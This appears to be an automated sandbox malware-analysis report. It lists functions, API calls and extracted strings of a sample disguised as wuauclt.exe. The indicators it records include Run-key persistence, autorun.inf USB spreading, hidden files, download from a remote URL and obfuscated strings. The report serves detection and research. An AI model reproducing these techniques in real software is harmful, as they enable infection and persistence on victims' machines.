                                                                            control_flow_graph 1247 40288c-4028a0 1248 4028a2-4028a3 1247->1248 1249 4028ad-4028c3 1247->1249 1251 4028c5-4028d4 1248->1251 1252 4028a5-4028a6 1248->1252 1250 4028ec-4028fe 1249->1250 1256 402904-40291c CreateFileA 1250->1256 1257 4029b6-4029d3 1250->1257 1255 4028e5 1251->1255 1253 4028d6-4028e0 1252->1253 1254 4028a8 1252->1254 1253->1255 1258 402a14-402a15 1254->1258 1255->1250 1261 402922-40292a 1256->1261 1262 402a2a-402a35 GetLastError 1256->1262 1259 4029d5-4029d7 1257->1259 1260 4029d9-4029df 1257->1260 1263 4029e7-4029ef GetStdHandle 1259->1263 1264 4029e1-4029e3 1260->1264 1265 4029e5 1260->1265 1266 402930-40293e GetFileSize 1261->1266 1267 4029f3-4029f9 1261->1267 1262->1258 1263->1262 1269 4029f1 1263->1269 1264->1263 1265->1263 1266->1262 1268 402944-402949 1266->1268 1270 402a12 1267->1270 1271 4029fb-402a04 GetFileType 1267->1271 1272 40294b 1268->1272 1273 40294d-40295a SetFilePointer 1268->1273 1269->1267 1270->1258 1274 402a16-402a28 CloseHandle 1271->1274 1275 402a06-402a09 1271->1275 1272->1273 1273->1262 1276 402960-40297c ReadFile 1273->1276 1274->1258 1275->1270 1277 402a0b 1275->1277 1276->1262 1278 402982 1276->1278 1277->1270 1279 402984-402986 1278->1279 1279->1267 1280 402988-402990 1279->1280 1281 402992-402993 1280->1281 1282 402995-4029a4 SetFilePointer 1280->1282 1281->1279 1282->1262 1283 4029aa-4029b2 SetEndOfFile 1282->1283 1283->1262 1284 4029b4 1283->1284 1284->1267
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402914
                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402938
                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402954
                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402975
                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 0040299E
                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 004029AC
                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 004029E7
                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 004029FD
                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00402A18
                                                                            • GetLastError.KERNEL32(000000F5), ref: 00402A30
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                            • String ID:
                                                                            • API String ID: 1694776339-0
                                                                            • Opcode ID: 4113a296a6b07ebc5190b62d8c07d533219a22d082d969f70b3c1b6d1517c3ba
                                                                            • Instruction ID: c08e0bc1a52ce57edfd428ff71f0c6be874f716b93af5554cff537b7abe3d1e7
                                                                            • Opcode Fuzzy Hash: 4113a296a6b07ebc5190b62d8c07d533219a22d082d969f70b3c1b6d1517c3ba
                                                                            • Instruction Fuzzy Hash: 1441A2706007009AE731AF288A0D76375D4FB44754F20CA3FE0D6B66E1EAFD98859B5D
                                                                            Function 00406728 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00404F84: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00404F97
                                                                              • Part of subcall function 00402728: GetSystemTime.KERNEL32(?), ref: 00402732
                                                                            • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 004067D0
                                                                            • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 0040681F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ExecuteShellSystem$DirectoryTime
                                                                            • String ID: A}vokwcq*`~f$SVOHOST.exe$kucm$lqrs>*)tsr(gra`lvjhf*fin$lqrs>*)tsr(lj``lvapg*fin
                                                                            • API String ID: 3953870399-2285911871
                                                                            • Opcode ID: 5a60625d515bbb0749ab80c7592574fde7c09cedb0ef7e96fb97db1a3d50b3f8
                                                                            • Instruction ID: 0ed2c2afb193c78c9d8b93d9018a26212a72780c50695523a22b01571590cbab
                                                                            • Opcode Fuzzy Hash: 5a60625d515bbb0749ab80c7592574fde7c09cedb0ef7e96fb97db1a3d50b3f8
                                                                            • Instruction Fuzzy Hash: B7215171601109ABD701FB95D842A9F77BDDF84708F51813BB901BB2C2DABC9E1086A9
                                                                            Function 00408A14 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 74windowtimeregistryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadIconA.USER32(00000000,00007F00), ref: 00408A4E
                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00408A5D
                                                                            • RegisterClassA.USER32(0042AE18), ref: 00408A7A
                                                                              • Part of subcall function 00404414: CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040443D
                                                                            • SetTimer.USER32(00000000,00000001,000005DC,004084C8), ref: 00408AD0
                                                                            • TranslateMessage.USER32(0042AE44), ref: 00408AE0
                                                                            • DispatchMessageA.USER32(0042AE44), ref: 00408AE6
                                                                            • GetMessageA.USER32(0042AE44,00000000,00000000,00000000), ref: 00408AF2
                                                                            • KillTimer.USER32(00000000,00007F72,0042AE44,00000000,00000000,00000000,?,?,00408D8D,00000000,00000000,00000000,00000000,00400000,00000000,00000104), ref: 00408B0B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Message$LoadTimer$ClassCreateCursorDispatchIconKillRegisterTranslateWindow
                                                                            • String ID: bbyb
                                                                            • API String ID: 638683977-2792963345
                                                                            • Opcode ID: 10646b1b30f831aae2ba82a84725ad5e78f7cae3c9c1bad9cc75a6da08a812fc
                                                                            • Instruction ID: 594542fb2c8cde3af6a4fe5998d0340eb89294e9bd4d21e9ef299eea2d4a1429
                                                                            • Opcode Fuzzy Hash: 10646b1b30f831aae2ba82a84725ad5e78f7cae3c9c1bad9cc75a6da08a812fc
                                                                            • Instruction Fuzzy Hash: DF2127B0784701AFE720DF649D82B1237E4AB44700F10853AFA85EF6D2DBB8A8118B5D
                                                                            Function 00406333 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 102COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDriveTypeA.KERNEL32(00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 004063BF
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406420
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406440
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile$DriveType
                                                                            • String ID: \autorun.inf$\sxs.exe$sxs.
                                                                            • API String ID: 1467228633-3893248116
                                                                            • Opcode ID: 71adc7361951f8c7509ea25619efebed4a0e59db825d7e1aa74bc3a9cd434a40
                                                                            • Instruction ID: d7b3d59c00894bd143ef4d30449a3bd145d8bcc858247ddb54af4904dd4dc33d
                                                                            • Opcode Fuzzy Hash: 71adc7361951f8c7509ea25619efebed4a0e59db825d7e1aa74bc3a9cd434a40
                                                                            • Instruction Fuzzy Hash: 4F31D4709002099BDB00FB50C952A9EBB79EF55308F514477E501B72D2C73DAF15C799
                                                                            Function 004080C8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 64filenetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 0040810F
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,0040819E,?,00000000,00000000,?,004084B1,?,00000000,?,004084C7,000493E0), ref: 00408132
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00408168
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 0040817E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$CacheEntryFile$DirectoryDownloadWindows
                                                                            • String ID: bbyb.dll$http://www.xxx.com/qqmsg.txt
                                                                            • API String ID: 2436712417-1998065829
                                                                            • Opcode ID: 3ddb6b2395be871ddeea2fb3607101ab18d3a0cfe0804a7c7e3355ca6e5b914b
                                                                            • Instruction ID: fb79d00d57ea562a78b15d8b1474b2916bd554e92aef79f5ae6ec560df59828f
                                                                            • Opcode Fuzzy Hash: 3ddb6b2395be871ddeea2fb3607101ab18d3a0cfe0804a7c7e3355ca6e5b914b
                                                                            • Instruction Fuzzy Hash: DF11FC70614204AFD700FB65CE42B9A7BBDEF45705F50407AF944BB6E2CB78AE058A6C
                                                                            Function 00407DC8 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 68sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(000DBBA0,00000000,00407EA2,?,00000000,00000000,00000000,00000000), ref: 00407DEC
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                              • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                              • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                              • Part of subcall function 00404C18: RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000,00407EA2), ref: 00404C54
                                                                              • Part of subcall function 00404C18: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C70
                                                                              • Part of subcall function 004068D0: InternetGetConnectedState.WININET(?,00000000), ref: 004068DF
                                                                            Strings
                                                                            • Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t, xrefs: 00407E4C
                                                                            • l}+2, xrefs: 00407E36
                                                                            • wuauclt.exe, xrefs: 00407DFC
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00407E16
                                                                            • Microsoft, xrefs: 00407E11
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseValue$ConnectedDirectoryInternetQuerySleepStateWindows
                                                                            • String ID: Microsoft$Software\Microsoft\Windows\CurrentVersion\Run$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$l}+2$wuauclt.exe
                                                                            • API String ID: 1219844470-3788782062
                                                                            • Opcode ID: 6665439d985228bc3137df265ac3c46a918ea1d5a36fa6834cb45f0f9932f8f6
                                                                            • Instruction ID: d9744ce1b4bbba914fbef4a0fdf434069bd0e944c21e36a7c6e37f089c0d93f6
                                                                            • Opcode Fuzzy Hash: 6665439d985228bc3137df265ac3c46a918ea1d5a36fa6834cb45f0f9932f8f6
                                                                            • Instruction Fuzzy Hash: C321A1B06152046FD701FBA5D95399E7BA8EF81304F5080BBB500B72D2CBB8BE0086A9
                                                                            Function 00407DD0 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 63sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(000DBBA0,00000000,00407EA2,?,00000000,00000000,00000000,00000000), ref: 00407DEC
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                              • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                              • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                              • Part of subcall function 00404C18: RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000,00407EA2), ref: 00404C54
                                                                              • Part of subcall function 00404C18: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C70
                                                                              • Part of subcall function 004068D0: InternetGetConnectedState.WININET(?,00000000), ref: 004068DF
                                                                            Strings
                                                                            • Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t, xrefs: 00407E4C
                                                                            • l}+2, xrefs: 00407E36
                                                                            • wuauclt.exe, xrefs: 00407DFC
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00407E16
                                                                            • Microsoft, xrefs: 00407E11
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseValue$ConnectedDirectoryInternetQuerySleepStateWindows
                                                                            • String ID: Microsoft$Software\Microsoft\Windows\CurrentVersion\Run$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$l}+2$wuauclt.exe
                                                                            • API String ID: 1219844470-3788782062
                                                                            • Opcode ID: ce5862bb30728e459670669a0c2fd2858caca85aa9105a01635d79dbd92c1f40
                                                                            • Instruction ID: 3575f48fa22139c18a4af409e614c0b40dd6271191b82a0b2a34aed62443784d
                                                                            • Opcode Fuzzy Hash: ce5862bb30728e459670669a0c2fd2858caca85aa9105a01635d79dbd92c1f40
                                                                            • Instruction Fuzzy Hash: 1C1142B0A15104ABD705FB95D95399E77A9EB84304F5084BBB500B72D2DBBCBE0086AD
                                                                            Function 00407F54 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 56sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(001B7740,00000000,00408012,?,00000000,00000000,00000000), ref: 00407F70
                                                                              • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                              • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                              • Part of subcall function 00406708: InternetGetConnectedState.WININET(?,00000000), ref: 00406717
                                                                            Strings
                                                                            • l}+2, xrefs: 00407F7F
                                                                            • wuauclt.exe, xrefs: 00407FBF
                                                                            • Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t, xrefs: 00407F95
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00407FD9
                                                                            • Microsoft, xrefs: 00407FD4
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseConnectedDirectoryInternetSleepStateValueWindows
                                                                            • String ID: Microsoft$Software\Microsoft\Windows\CurrentVersion\Run$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$l}+2$wuauclt.exe
                                                                            • API String ID: 3088811538-3788782062
                                                                            • Opcode ID: 2bd880a330ccf7098cd0f064fbb41e6f7692dc24caeb265b28b5c7e1db9d23fc
                                                                            • Instruction ID: 026fbd7338b316a051164a3f2916be19fdbad90e0342d7335669e4ba070194ba
                                                                            • Opcode Fuzzy Hash: 2bd880a330ccf7098cd0f064fbb41e6f7692dc24caeb265b28b5c7e1db9d23fc
                                                                            • Instruction Fuzzy Hash: 8F112170740204ABE701BAA5D913B5D77A8DB84708F61807FF540BB2D2CFBD9E04966D
                                                                            Function 004017B8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlInitializeCriticalSection.NTDLL(0040A5B0), ref: 004017CE
                                                                            • RtlEnterCriticalSection.NTDLL(0040A5B0), ref: 004017E1
                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,00000000,0040186E,?,?,00402052), ref: 0040180B
                                                                            • RtlLeaveCriticalSection.NTDLL(0040A5B0), ref: 00401868
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                            • String ID: Hh
                                                                            • API String ID: 730355536-2683877627
                                                                            • Opcode ID: 5c19f900fa3a488fd33420dfa6c401149df2a56146d2d3e02916e60ccae6ed6d
                                                                            • Instruction ID: 5f09b27ca823af9dd1356ce4e247dec4ea3fcd1be7825b8ef208c2b79a25235a
                                                                            • Opcode Fuzzy Hash: 5c19f900fa3a488fd33420dfa6c401149df2a56146d2d3e02916e60ccae6ed6d
                                                                            • Instruction Fuzzy Hash: 0E018470644340AED319AB6A9D06F163AA4E74E704F14C47BE140BB2F2D6BD44A08B5F
                                                                            Function 005418B2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 88synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00544348), ref: 005418FC
                                                                            • FindCloseChangeNotification.KERNEL32(?), ref: 0054192E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3253164926.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_540000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ChangeCloseCreateFindMutexNotification
                                                                            • String ID: $CT$HCT
                                                                            • API String ID: 2967213129-72007170
                                                                            • Opcode ID: c86217b52a9a5dd126fb4d416871ea2ea62c1809a1e2308bb043aeccabdd6982
                                                                            • Instruction ID: 40b3ad234d52e71ef9c1452f9cc6282dc1abfef32452a0dea914cff4cb9769f9
                                                                            • Opcode Fuzzy Hash: c86217b52a9a5dd126fb4d416871ea2ea62c1809a1e2308bb043aeccabdd6982
                                                                            • Instruction Fuzzy Hash: 5F219234550624BBC7259FA29C4CDFF3EBDFBA7B9DB50481AF10AD2110DB208884EA74
                                                                            Function 0043834B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 004383ED
                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 00438509
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$FreeProtect
                                                                            • String ID: @O:r
                                                                            • API String ID: 2581862158-1513391029
                                                                            • Opcode ID: 62998878eee791b55a4525ffa1200409ee62ec3c0713ca06769709f58399dcba
                                                                            • Instruction ID: 1c248bd57497abf13f7211ff5bbec31fcd2e4003a81eef7960cbaa05da7696eb
                                                                            • Opcode Fuzzy Hash: 62998878eee791b55a4525ffa1200409ee62ec3c0713ca06769709f58399dcba
                                                                            • Instruction Fuzzy Hash: D25139322043169FE7258B18CC907E6F7A1EF99314F38506EF9498B781EB79AC42CB54
                                                                            Function 005F0000 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 92memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,0000116C,00001000,00000004), ref: 005F00A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000003.2045966344.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_3_5f0000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID: -
                                                                            • API String ID: 4275171209-2547889144
